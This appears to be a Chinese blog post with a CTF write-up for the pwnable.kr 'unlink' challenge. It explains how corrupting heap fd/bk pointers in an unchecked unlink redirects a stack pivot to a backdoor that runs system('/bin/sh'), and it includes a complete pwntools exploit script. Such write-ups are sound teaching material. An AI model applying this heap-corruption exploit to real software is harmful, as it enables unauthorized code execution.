美文网首页
[Toddler's Bottle]-unlink

[Toddler's Bottle]-unlink

作者: 2mpossible | 来源:发表于2018-12-10 15:47 被阅读0次
  • 用c模拟了旧的unlink,没有校验,本来想直接覆盖返回地址为后门地址,但是会破坏后门
void unlink(OBJ* P){
    OBJ* BK;
    OBJ* FD;
    BK=P->bk;
    FD=P->fd;
    FD->bk=BK;
    BK->fd=FD;
}
  • 这里发现会将[ecx-4]的值给esp,然后再ret,而ecx的值是ebp-4的值,所以我们考虑将ebp-4的值覆盖为堆上某一地址,然后在堆上写上后门地址,这样就能ret到后门执行system('/bin/sh')
  • 这里我在A -> buf 写入后门地址(即*(heap_addr + 8)= shell_addr),然后覆盖B - fd = heap_addr+12,B - > bk = ebp-4,当执行unlink函数的时候
FD -> bk = heap_addr + 12 + 4 = heap_addr + 16 = BK = ebp-4
BK -> fd = ebp-4 = FD = heap_addr + 12
  • 所以[ecx-4] = [heap_addr + 12 - 4] 此时就是后门地址,然后就能getshell

exp:

from pwn import *

p = process('./unlink')

p.recvuntil('leak: 0x')
stack_addr = int(p.recvuntil('\n',drop = True),16)
log.success('stack addr : 0x%x'%stack_addr)
p.recvuntil('leak: 0x')
heap_addr = int(p.recvuntil('\n',drop = True),16)
log.success('heap addr : 0x%x'%heap_addr)

system_addr = 0X080484EB
ebp_4 = stack_addr + 16


payload = p32(system_addr) + 'a'*4 + p32(0) + p32(0x19) 
payload += p32(heap_addr+12) + p32(ebp_4)
#gdb.attach(p)
p.recvuntil('shell!\n')
p.sendline(payload)

p.interactive()

相关文章

  • [Toddler's Bottle]-unlink

    用c模拟了旧的unlink,没有校验,本来想直接覆盖返回地址为后门地址,但是会破坏后门 这里发现会将[ecx-4]...

  • [Toddler's Bottle]-blackjack

    一个经典的21点游戏,我们的目标是赚到1百万才有flag,看源码发现bet可以输入负数,比如输入-10000000...

  • [Toddler's Bottle]-fd

    由于刚入手pwn,所以想着做些基础的题来提升自己,为了以后方便回顾首先来看源码 首先可以知道我们运行程序的时候需要...

  • [Toddler's Bottle]-collision

    代码如下: 首先要有一个命令行参数,而且长度必须为20跟着在check_password里面强制转化为int指针,...

  • [Toddler's Bottle]-random

    首先我们看源代码 可以看到random这个函数,由于没有设置种子(设置种子也要变化啊)所以可以知道这里是伪随机数,...

  • [Toddler's Bottle]-bof

    下载好源码和源文件: 从源码可以看出这题大概是要溢出overflowme从而覆盖key的值为0xcafebabe,...

  • [Toddler's Bottle]-flag

    这题一开始用ida看什么都没看出来,后来看了网上的WP才知道这题是加了壳的,从十六进制中可以看到确实加了upx壳 ...

  • [Toddler's Bottle]-passcode

    之前一直不能下载文件到本地,今天用了FlashFXP无意间可以下载到本地了 主要@前面的是用户名,之前一直不知道 ...

  • [Toddler's Bottle]-input

    需要对linux操作有一定的认识,前面的绕过ida或者看源码都能推出来,最后由于我们在input2目录下没有写文件...

  • [Toddler's Bottle]-leg

    key1()函数获取pc寄存器的值,key2()函数获取pc寄存器 + 4的值,key3()函数获得lr寄存器的值...

网友评论

      本文标题:[Toddler's Bottle]-unlink

      本文链接:https://www.haomeiwen.com/subject/cxarhqtx.html